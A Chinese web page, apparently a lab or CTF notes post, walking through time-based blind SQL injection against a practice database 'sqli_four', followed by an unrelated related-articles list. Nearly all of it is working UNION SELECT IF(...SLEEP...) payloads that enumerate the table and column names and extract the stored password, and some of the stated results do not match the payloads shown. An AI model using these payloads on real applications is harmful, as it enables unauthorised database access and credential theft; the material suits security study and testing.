当前位置: 首页 > news >正文

延迟注入

猜数据库长度:9位

union select if(length(database())=9, sleep(3), 0), 2;--

猜数据库名:sqli_four

UNION SELECT IF(database()="sqli_four", SLEEP(3), 0), 2;--

猜数据库表数量:2

UNION SELECT IF((select count(table_name) from information_schema.tables where table_schema = database())=2, SLEEP(3), 0), 2;--

猜测表名长度: 表一:19位 表2:5位

UNION SELECT IF(length((select table_name from information_schema.tables where table_schema='sqli_four' limit 0,1))=8, SLEEP(3), 0), 2;--

猜表2表名:users

UNION SELECT IF(ascii(substr((select table_name from information_schema.tables where table_schema='sqli_four' limit 1,1),1,1))=101, SLEEP(3), 0), 2;--

猜第一列长度:2

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1))=2, sleep(3), 0), 2;--

猜第一列名:id

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1)="id", sleep(3), 0), 2;--

猜第二列长度:8

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1))=2, sleep(3), 0), 2;--

猜第二列名:password

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1)="password", sleep(3), 0), 2;--

查询有几个记录:1条

union select if((select count(id) from users)=1,sleep(3), 0), 2;--

查询第一个id长度:1

union select if(length((select id from sqli_four.users limit 0,1))=5, sleep(3), 0), 2;--

查询第一个id值:1

union select if((select id from sqli_four.users limit 0,1)=1, sleep(3), 0), 2;--

查询id=1的密码长度:4

union select if(length((select password from sqli_four.users limit 0,1))=4, sleep(3), 0), 2;--

查询id=1的密码值:4961

union select if(ascii(substr((select password from sqli_four.users limit 0,1),1,1))=101, sleep(3), 0), 2;--

http://www.gsyq.cn/news/68178.html

相关文章:

  • ORM注入
  • 2025空调配套优选!空调机组风机哪家好?高适配品牌盘点
  • MySQL运维
  • React的设计理念与核心特性 - 指南
  • 语言安全
  • 机油壶吹塑设备哪家好?2025机油壶吹塑设备厂家权威排行
  • 2025年情人节送女友礼物推荐:哪样最显心意?深度解析与避坑指南
  • 实用指南:​​MQTT协议发展历程与版本演进:从工业监控到物联网核心的协议进化​
  • 2025年移民服务机构综合测评:十大移民公司关键数据与适配场景全解析
  • Solon v3.7 黑科技: 消灭空指针异常!
  • kmeans聚类,无需标签,无监督学习
  • P3733 [HAOI2017] 八纵八横
  • 利用鸢尾花数据集,结合树方法实现分类
  • Python3 StringIO 模块详解
  • 2025年工业清洗剂厂家排行榜:清洗剂制造厂哪家售后好
  • 2025年12月电竞培训学校对比评价与推荐排行榜:五所机构深度解析
  • swift 双范围slider
  • 2025年12月成都艺考文化课培训学校推荐排行榜单对比与评测分析
  • 2025年12月电竞培训学校推荐排行榜:五家机构综合对比与择校指南
  • 2025年12月制氢厂家推荐排行:基于技术实力与项目经验的五家厂商客观对比
  • 2025年12月制氢厂家推荐排行榜单对比分析:行业头部企业实力解析与选购指南
  • 2025年12月耐火砖厂家推荐排行对比分析:五家企业综合评估与选择指南
  • 北京注重个人隐私能保密的上门字画收购个人和公司
  • 二零二五年十二月耐火砖厂家推荐排行与评测:基于产品性能及服务能力的客观对比分析
  • 2025年诚信的床上用品/蚕丝床上用品最新TOP品牌厂家排行
  • 布鲁克核磁扫描参数
  • 二零二五年十二月成公关公司推荐排行榜对比评测:专业服务助力品牌形象提升
  • 2025年评价高的儿童蚕丝被行业内知名厂家排行榜
  • 2025年12月成公关公司推荐排行榜单对比:专业服务深度评测与实用选择指南
  • 二零二五年十二月成公关公司推荐排行榜:专业评测与客观对比分析